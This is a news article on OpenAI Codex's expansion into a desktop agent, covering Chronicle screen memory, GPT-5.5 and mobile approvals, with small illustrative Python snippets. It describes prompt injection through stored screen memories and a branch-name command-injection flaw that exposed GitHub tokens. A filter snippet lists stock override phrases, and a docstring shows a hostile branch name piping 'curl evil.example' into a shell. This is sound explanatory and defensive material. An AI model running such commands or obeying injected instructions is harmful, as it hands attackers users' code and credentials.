OpenAI Codex Becomes Desktop Agent: Controls Mac Apps, Watches Screen, Runs on Mobile

In about four weeks this spring, OpenAI turned Codex from a sandboxed code-runner into a desktop agent that operates Mac applications with its own cursor, captures your screen to build ambient memory, executes tasks on a schedule, and now follows you to your phone. The transformation unfolded across three major updates, on April 16, April 20, and May 14, and the product that most of the platform's more than 4 million weekly developers knew as recently as March is no longer the one they use today.

OpenAI Codex Crossed From Sandboxed Tool to Desktop Agent in April

The original Codex, introduced as a research preview in May 2025, was deliberately bounded: it ran inside an isolated cloud sandbox, operated on copies of a user's code, and had no access to the local desktop or other applications. That boundary no longer exists. On April 16, OpenAI released what it called "Codex for (almost) everything," adding computer-use capabilities that let the agent operate a Mac's mouse and keyboard inside any application — not just those with APIs — alongside local file access, an in-app browser, and image generation through GPT Image 1.5.

The agent now runs multiple background tasks simultaneously without interrupting the user's foreground work. It can navigate a third-party application to test a user interface, switch into a browser session to fetch and inspect a webpage, or install and run one of more than 90 new plugins from a catalog that includes Atlassian Rovo for Jira management, CircleCI, CodeRabbit, GitLab Issues, the Microsoft Suite, Neon by Databricks, Remotion for programmatic video, Render, and Superpowers. Each plugin pairs a reusable instruction-and-script bundle — OpenAI calls these Skills — with an app-specific connector built on the Model Context Protocol standard. Skills can also be built by users themselves; community-authored examples include scraping YouTube transcripts, generating Excalidraw diagrams, and auto-deploying mobile apps to public test URLs. Skills can run on daily or weekly automated schedules — the closest any consumer AI product has come to a natural-language personal cron job.

What Is Codex Chronicle and What Privacy Risks Does It Carry?

Four days after the April 16 update, OpenAI introduced Chronicle — the feature drawing the most independent security commentary. According to OpenAI's developer documentation, Chronicle runs sandboxed background agents that periodically capture screenshots of the user's screen, extract text via optical character recognition, and summarize selected frames into text-based memories stored as Markdown files on the user's device. When a user later asks Codex something like "fix this" or "continue what I was working on yesterday," the agent reads those stored memories to resolve the reference without requiring the user to re-explain context.

The design is intentionally framed as an answer to a real problem: AI tools that require restating context in every session. But OpenAI's own documentation lists the trade-offs with unusual directness. The feature "uses rate limits quickly, increases risk of prompt injection, and stores memories unencrypted on your device." Selected screenshot frames are processed through OpenAI's servers to generate memories; OpenAI says it does not retain the screenshots after processing unless required by law. Screen captures older than six hours are automatically deleted while the feature is active. The locally stored Markdown memory files, however, are accessible to other applications running on the machine, as the developer documentation confirms.
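One narrow check a user could run on those files is whether their permission bits expose them to other accounts on the same Mac. The Python sketch below assumes the memories sit as .md files under a directory the caller supplies; the real location is not given here, so memory_dir and both function names are hypothetical. It does not address other applications running as the same user, which can read the files regardless of these bits.

```python
import stat
from pathlib import Path


def group_or_other_readable(path: Path) -> bool:
    """True if the file's mode grants read access to group or other users."""
    mode = path.stat().st_mode
    return bool(mode & (stat.S_IRGRP | stat.S_IROTH))


def audit_memories(memory_dir: Path) -> list[Path]:
    """Return Markdown files under memory_dir that are readable beyond the owner.

    memory_dir is a hypothetical location supplied by the caller.
    """
    return sorted(
        p for p in memory_dir.rglob("*.md") if group_or_other_readable(p)
    )
```

Any path the audit returns could be tightened with os.chmod(path, 0o600), which limits access to the owning account but still leaves the contents unencrypted on disk.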

The prompt injection risk is not theoretical. Chronicle reads everything on screen at the time of capture — including webpages. If a user browses a page containing hidden or disguised instructions, Codex may follow those instructions the next time it reads that memory, according to OpenAI's own documentation. OpenAI recommends pausing Chronicle before meetings or when viewing sensitive material — an acknowledgment that the feature will capture things it should not, with the management burden placed on the user.
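To make the mechanism concrete, here is a rough Python sketch of how captured text might be screened for instruction-like phrases before anyone trusts it. The phrase list and the function name are assumptions made for illustration, not anything OpenAI documents, and a keyword filter like this catches only the crudest attempts.

```python
import re

# Hypothetical phrases seen in simple injection attempts; not an exhaustive list.
SUSPICIOUS = re.compile(
    r"ignore (all )?(previous|prior|above) instructions"
    r"|disregard (the )?(previous|prior|above)"
    r"|you are now"
    r"|run the following command",
    re.IGNORECASE,
)


def flag_suspicious_lines(memory_text: str) -> list[tuple[int, str]]:
    """Return (line_number, line) pairs whose text matches a suspicious phrase."""
    return [
        (number, line)
        for number, line in enumerate(memory_text.splitlines(), start=1)
        if SUSPICIOUS.search(line)
    ]
```

A flagged line is a prompt for human review, not proof of an attack; disguised or paraphrased instructions would pass straight through a filter of this kind.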

Multiple security outlets drew explicit comparisons to Microsoft's Recall, a Windows feature that also captured periodic screenshots and faced sustained criticism from the security community in 2024. Chronicle's restricted rollout — available only to ChatGPT Pro subscribers on Apple Silicon Macs, with access blocked in the European Union, United Kingdom, and Switzerland — reflects unresolved regulatory questions that OpenAI has not yet publicly answered in detail.

GPT-5.5 Becomes Codex Default With Record Agentic Coding Benchmark

Underlying the April updates is a new model. OpenAI announced GPT-5.5 on April 23 and made it available in the API on April 24, positioning it as the recommended default for most Codex tasks while keeping GPT-5.4 available as an alternative. On Terminal-Bench 2.0, which tests complex command-line workflows requiring planning, iteration, and tool coordination, GPT-5.5 achieved 82.7% accuracy — OpenAI's highest agentic-coding benchmark score to date. Michael Truell, co-founder and chief executive of Cursor, said the model is "noticeably smarter and more persistent than GPT-5.4, with stronger coding performance and more reliable tool use" and "stays on task for significantly longer without stopping early."

GPT-5.5 supports a one-million-token context window in the API and a 400,000-token window in Codex. OpenAI says the model completes the same Codex tasks with fewer tokens than GPT-5.4, offsetting its higher per-token price for most users.
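The offset claim comes down to simple arithmetic: cost per task is tokens used times price per token, so a pricier model is cheaper per task only when its token savings outpace its price increase. The Python sketch below shows that break-even condition. The function names are illustrative, and no real prices or token counts are implied, since OpenAI's figures are not given here.

```python
def task_cost(tokens: int, price_per_million: float) -> float:
    """Cost of one task in dollars: tokens times the per-million-token price."""
    return tokens / 1_000_000 * price_per_million


def breakeven_token_ratio(old_price: float, new_price: float) -> float:
    """Largest new/old token ratio at which the new model costs no more per task.

    Derived from new_tokens * new_price <= old_tokens * old_price.
    """
    return old_price / new_price
```

With hypothetical prices of $10 and $12.50 per million tokens, the break-even ratio is 0.8: the newer model comes out cheaper per task only if it finishes the same work in fewer than 80% of the tokens.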

Codex Mobile App Turns Your Phone Into Remote Control for Running Agent Tasks

The third major update, released May 14 as a preview for all ChatGPT plans including the free tier, does not run code on the phone. The ChatGPT mobile app instead displays a live view of Codex sessions executing on the user's paired desktop or remote development environment: terminal output, file diffs, screenshots from the desktop browser session, and the agent's pending approval requests. Users can approve or reject specific commands, switch between GPT-5.4 and GPT-5.5 mid-run, and start new projects from their phones. All sensitive material — credentials, files, local environment settings — remains on the host machine; only outputs and approval requests cross the wire. Windows support is listed as coming soon; the mobile integration currently requires the Codex desktop app on macOS.

The practical effect: a developer can start a multi-hour refactor at the office, leave, and approve commits, reject a specific change, or answer an ambiguity question from a restaurant. OpenAI describes this as enabling "a new rhythm for collaboration" in which long-running autonomous agent tasks pause only when human judgment is needed.
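The rhythm described here, in which work proceeds until a decision is needed, can be sketched as an approval-gated loop. This Python example is a simplified illustration, not OpenAI's implementation: the Step type, the needs_approval flag, and the decide callback (standing in for a tap on the phone) are all hypothetical.

```python
from dataclasses import dataclass
from typing import Callable, Iterable


@dataclass
class Step:
    description: str      # what the agent wants to do, e.g. a shell command
    needs_approval: bool  # hypothetical flag set by the host's policy


def run_with_approvals(
    steps: Iterable[Step], decide: Callable[[Step], bool]
) -> list[str]:
    """Process steps in order, consulting decide() only for flagged steps."""
    log = []
    for step in steps:
        if step.needs_approval and not decide(step):
            log.append(f"rejected: {step.description}")
            continue
        # A real agent would execute the step here; the sketch only records it.
        log.append(f"ran: {step.description}")
    return log
```

Only the step description and the yes-or-no answer pass through decide(), which mirrors the claim that outputs and approval requests are what cross the wire.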

How Does OpenAI Codex Work as an AI Coding Agent?

To understand the significance of these updates, it helps to know what Codex was and where the new boundary sits. From its May 2025 launch through early 2026, the product's defining characteristic was containment: tasks ran in isolated cloud sandboxes preloaded with the user's codebase, the agent could not reach the internet during execution by default, and nothing touched the local desktop. A user prompted, Codex executed in a container, and results came back as diffs and test logs for human review.

The April updates relocated that boundary. Codex now has local file access and can operate any Mac application directly. It can open a browser, click through a web interface, inspect a live application, and generate an image — all within a single task. The plugin ecosystem extends its reach into third-party services. Chronicle reaches beyond active prompts into ambient activity. The mobile integration moves the approval loop off the desktop entirely.

Security researchers at BeyondTrust's Phantom Labs documented what happens when the boundaries of a live-execution environment are not policed carefully: in December 2025, researcher Tyler Jespersen found that Codex passed GitHub branch names directly into shell commands without sanitization. An attacker could embed malicious commands in a branch name and retrieve a victim's GitHub authentication token in cleartext, with potential read/write access to the entire codebase. OpenAI patched the vulnerability on February 5, 2026. Check Point Research's Eli Smadja summarized the lesson: "Don't assume AI tools are secure by default." The new computer-use and Chronicle capabilities create a meaningfully larger attack surface than the sandboxed product in which that vulnerability was found.
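The general class of bug, untrusted text interpolated into a shell command, is easy to show in a few lines of Python. The sketch below is not Codex's code; the function names and the allow-list pattern are assumptions chosen for illustration, and the pattern is deliberately stricter than Git's actual ref-name rules.

```python
import re

# Hypothetical allow-list: letters, digits, dot, underscore, slash, hyphen.
SAFE_BRANCH = re.compile(r"[A-Za-z0-9._/-]+")


def unsafe_command(branch: str) -> str:
    """Build a shell string by interpolation (the vulnerable pattern)."""
    return f"git checkout {branch}"


def is_safe_branch(branch: str) -> bool:
    """Accept only allow-listed names that cannot be mistaken for an option."""
    return bool(SAFE_BRANCH.fullmatch(branch)) and not branch.startswith("-")


def safe_argv(branch: str) -> list[str]:
    """Return an argument list suitable for subprocess.run(argv), no shell."""
    if not is_safe_branch(branch):
        raise ValueError(f"rejected branch name: {branch!r}")
    return ["git", "checkout", branch]
```

A branch named "main; curl evil.example | sh" turns unsafe_command() into two shell commands if the string is handed to a shell, while safe_argv() rejects it outright. Passing the list to subprocess.run without shell=True keeps the name a single argument even if validation were looser.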

What This Changes for Developers and Non-Developers

Three groups feel the update most directly. Software developers now have a coding agent that can handle long multi-step tasks without requiring continuous human supervision — and can hand off approval decisions to a phone rather than a laptop. Knowledge workers who would not previously have described themselves as developers can author Skills that run on automated schedules: generating a weekly digest, populating a spreadsheet from online sources, or drafting visual diagrams, without writing code in the traditional sense. Users who want an assistant that retains context across sessions get, in Chronicle, a solution that carries real privacy trade-offs they need to weigh before enabling.

None of these capabilities (the mobile integration, Chronicle, or the plugin ecosystem at scale) has been stress-tested in the kinds of long-horizon production environments where failure modes become visible. The shape of what Codex is becoming is now clear. How it changes the way people actually work, and whether its security posture holds at scale, will take longer to establish.

Frequently Asked Questions

What does OpenAI Codex's Chronicle feature do?

Chronicle is an opt-in feature that runs background agents to capture periodic screenshots of the user's screen, extract text, and build persistent memories stored as Markdown files on the device. When users ask Codex to continue a task or reference something they were working on, Codex reads those memories instead of requiring the user to re-explain context. The feature is currently available only to ChatGPT Pro subscribers on Apple Silicon Macs and is not available in the EU, UK, or Switzerland.

Is OpenAI Codex safe to use as a desktop AI agent?

Codex's expanded capabilities create a larger security surface than the original sandboxed product. OpenAI's own documentation warns that Chronicle increases exposure to prompt injection attacks — malicious instructions embedded in a webpage the user views can enter the memory store and later be executed by Codex. A patched December 2025 vulnerability discovered by BeyondTrust showed that Codex's execution environment could be exploited to steal GitHub authentication tokens via maliciously crafted branch names. OpenAI has addressed that specific flaw, but security researchers advise treating any AI live-execution environment as a privileged system requiring careful governance.

Can I use OpenAI Codex on my phone?

Yes. As of May 14, 2026, Codex is available in preview inside the ChatGPT mobile app on iOS and Android across all plans, including the free tier. The phone functions as a remote control: it displays live output from a Codex session running on a paired Mac, lets users approve or reject commands, and allows starting new tasks, but does not execute code locally on the phone. Windows desktop support is listed as coming soon.

What is GPT-5.5 and how does it improve Codex?

GPT-5.5 is OpenAI's latest frontier model, announced April 23, 2026, and the new recommended default for most Codex tasks. On Terminal-Bench 2.0, it scored 82.7%, the highest agentic-coding benchmark result OpenAI has published. The model supports a one-million-token context window in the API and a 400,000-token window in Codex, and OpenAI says it completes Codex tasks with fewer tokens than its predecessor GPT-5.4, which offsets its higher per-token price for most users.
